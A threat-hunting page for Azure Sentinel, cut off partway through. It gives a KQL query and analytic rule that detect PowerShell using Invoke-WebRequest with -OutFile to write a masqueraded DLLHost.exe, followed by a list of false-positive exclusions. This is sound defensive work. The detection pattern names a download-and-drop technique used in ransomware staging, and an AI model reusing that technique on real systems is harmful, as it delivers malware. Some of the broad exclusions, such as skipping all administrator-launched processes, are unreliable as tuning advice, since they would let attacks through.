DLLHost.exe file creation via PowerShell

Hunt Hypothesis

Adversaries may use PowerShell to create a masqueraded DLLHost.exe file as part of a persistence or execution tactic. SOC teams should proactively hunt for this behavior in Azure Sentinel to detect potential malware or persistence mechanisms that evade traditional detection methods.

KQL Query

DeviceProcessEvents 
| where InitiatingProcessFileName =~ 'powershell.exe' 
| where InitiatingProcessCommandLine has_all('$file=', 'dllhost.exe', 'Invoke-WebRequest', '-OutFile')

Analytic Rule Definition

id: 361aa11c-c7ad-4ef0-99fd-2ef52ddd2ba6
name: DLLHost.exe file creation via PowerShell
description: |
  Identify masqueraded DLLHost.exe file created by PowerShell.
requiredDataConnectors:
- connectorId: MicrosoftThreatProtection
  dataTypes:
  - DeviceProcessEvents
tactics:
- Execution
query: |   
  DeviceProcessEvents 
  | where InitiatingProcessFileName =~ 'powershell.exe' 
  | where InitiatingProcessCommandLine has_all('$file=', 'dllhost.exe', 'Invoke-WebRequest', '-OutFile')

Required Data Sources

Sentinel Table	Notes
`DeviceProcessEvents`	Ensure this data connector is enabled

MITRE ATT&CK Context

Tactic: Execution

References

[Source Query](https://github.com/Azure/Azure-Sentinel/blob/main/Hunting Queries/Microsoft 365 Defender/Ransomware/DEV-0270/DLLHost.exe file creation via PowerShell.yaml)

False Positive Guidance

Scenario: Scheduled Task Running DLLHost.exe via PowerShell
Description: A legitimate scheduled task uses PowerShell to launch DLLHost.exe as part of a service or application deployment.
Filter/Exclusion: Exclude processes initiated by scheduled tasks with known legitimate task names (e.g., TaskScheduler or Microsoft\Windows\TaskScheduler). Use process.parent_process_name to filter out tasks managed by schtasks.exe.
Scenario: PowerShell Script for Application Initialization
Description: A system management script uses PowerShell to start DLLHost.exe as part of initializing a service or application.
Filter/Exclusion: Exclude processes launched by scripts located in known system directories (e.g., C:\Windows\System32\) or by trusted administrators using tools like PowerShell.exe with a known script path.
Scenario: Microsoft Intune or Configuration Manager Deployment
Description: A deployment tool like Microsoft Intune or SCCM uses PowerShell to deploy software that requires DLLHost.exe to run.
Filter/Exclusion: Exclude processes initiated by msiexec.exe, setup.exe, or ConfigurationManager.exe and filter based on the originating user or machine group.
Scenario: Admin Task to Monitor or Debug DLLHost.exe
Description: An administrator uses PowerShell to monitor or debug DLLHost.exe for troubleshooting purposes.
Filter/Exclusion: Exclude processes launched by users with administrative privileges and where the command line includes debugging tools like Procmon.exe or Process Explorer.
Scenario: PowerShell Module or Script for System Maintenance
Description: A PowerShell module or script used for system maintenance (e.g., patching, cleanup) triggers DLLHost.exe as part of its execution flow.
Filter/Exclusion: Exclude processes where the command line includes known maintenance scripts or